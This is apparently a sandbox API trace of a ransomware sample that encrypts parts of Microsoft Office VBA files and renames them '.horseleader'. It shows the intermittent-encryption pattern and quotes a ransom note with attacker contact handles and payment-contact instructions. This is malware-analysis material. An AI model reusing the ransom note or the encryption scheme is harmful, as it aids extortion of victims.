liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.390] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.390] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.390] CloseHandle (hObject=0x15c) returned 1 [0250.403] GetProcessHeap () returned 0x780000 [0250.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.403] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.horseleader") returned 86 [0250.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.horseleader")) returned 1 [0250.404] GetProcessHeap () returned 0x780000 [0250.404] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.404] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9896ac00, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9896ac00, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x1e434, 
dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBOB6.CHM", cAlternateFileName="")) returned 1 [0250.404] lstrcmpiW (lpString1="VBOB6.CHM", lpString2="Windows") returned -1 [0250.404] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0250.404] StrStrIW (lpFirst="VBOB6.CHM", lpSrch=".horseleader") returned 0x0 [0250.404] lstrcmpW (lpString1="VBOB6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.404] lstrcmpW (lpString1="VBOB6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.404] lstrlenW (lpString=".testttjffg") returned 11 [0250.404] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.404] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.404] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.405] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0250.405] StrStrW (lpFirst="VBOB6.CHM", lpSrch=".txt") returned 0x0 [0250.405] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=123956) returned 1 [0250.405] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.406] 
ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.412] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.412] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.412] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xca1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.412] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.412] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.413] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.413] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x19434, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.413] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.413] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.413] WriteFile (in: 
hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.413] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.414] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.414] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.414] CloseHandle (hObject=0x15c) returned 1 [0250.414] GetProcessHeap () returned 0x780000 [0250.414] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.414] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.horseleader") returned 86 [0250.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.horseleader")) returned 1 [0250.415] GetProcessHeap () returned 0x780000 [0250.415] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.415] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eee700, 
ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa0eee700, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x65c96, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBUI6.CHM", cAlternateFileName="")) returned 1 [0250.415] lstrcmpiW (lpString1="VBUI6.CHM", lpString2="Windows") returned -1 [0250.415] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0250.415] StrStrIW (lpFirst="VBUI6.CHM", lpSrch=".horseleader") returned 0x0 [0250.415] lstrcmpW (lpString1="VBUI6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.415] lstrcmpW (lpString1="VBUI6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.415] lstrlenW (lpString=".testttjffg") returned 11 [0250.415] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.415] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.416] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0250.417] StrStrW (lpFirst="VBUI6.CHM", lpSrch=".txt") returned 0x0 [0250.417] GetFileSizeEx 
(in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=416918) returned 1 [0250.417] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.417] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.419] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.419] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.420] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x3064b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.420] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.422] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.422] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.422] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x60c96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.422] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, 
lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.424] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.425] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.425] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.425] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.425] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.425] CloseHandle (hObject=0x15c) returned 1 [0250.425] GetProcessHeap () returned 0x780000 [0250.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.425] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.horseleader") returned 86 [0250.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.horseleader")) returned 1 [0250.427] GetProcessHeap () returned 0x780000 [0250.427] 
HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.427] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eee700, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa0eee700, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x65c96, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBUI6.CHM", cAlternateFileName="")) returned 0 [0250.427] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.427] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\#Decrypt#.txt") returned 78 [0250.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.428] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.428] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0250.429] lstrlenA (lpString="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") returned 1368 [0250.429] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0250.429] CloseHandle (hObject=0x1a4) returned 1 [0250.429] GetProcessHeap () returned 0x780000 [0250.429] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.429] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d3ae00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xe2340dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56d3ae00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x381748, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="VBE7.DLL", cAlternateFileName="")) returned 1 [0250.429] lstrcmpiW (lpString1="VBE7.DLL", lpString2="Windows") returned -1 [0250.429] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0250.429] StrStrIW (lpFirst="VBE7.DLL", lpSrch=".horseleader") returned 0x0 [0250.429] lstrcmpW (lpString1="VBE7.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.429] lstrcmpW (lpString1="VBE7.DLL", lpString2="_uninstalling_.png") returned 1 [0250.430] lstrlenW (lpString=".testttjffg") returned 11 [0250.430] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\VBA\\VBA7\\VBE7.DLL", lpSrch=".testttjffg") returned 0x0 [0250.430] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.430] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0250.431] StrStrW (lpFirst="VBE7.DLL", lpSrch=".txt") returned 0x0 [0250.431] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3675976) returned 1 [0250.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.432] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.434] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.434] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.435] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1be3a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.435] 
ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.440] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.440] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.440] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x37c748, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.440] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.444] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.444] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.445] CloseHandle (hObject=0x1a4) returned 1 [0250.445] GetProcessHeap () returned 0x780000 [0250.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.445] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.horseleader") returned 80 [0250.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.horseleader")) returned 1 [0250.446] GetProcessHeap () returned 0x780000 [0250.446] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.446] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d3ae00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xe2340dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56d3ae00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x381748, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="VBE7.DLL", cAlternateFileName="")) returned 0 [0250.446] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.446] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\#Decrypt#.txt") returned 73 [0250.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\#Decrypt#.txt" (normalized: "c:\\program files\\common 
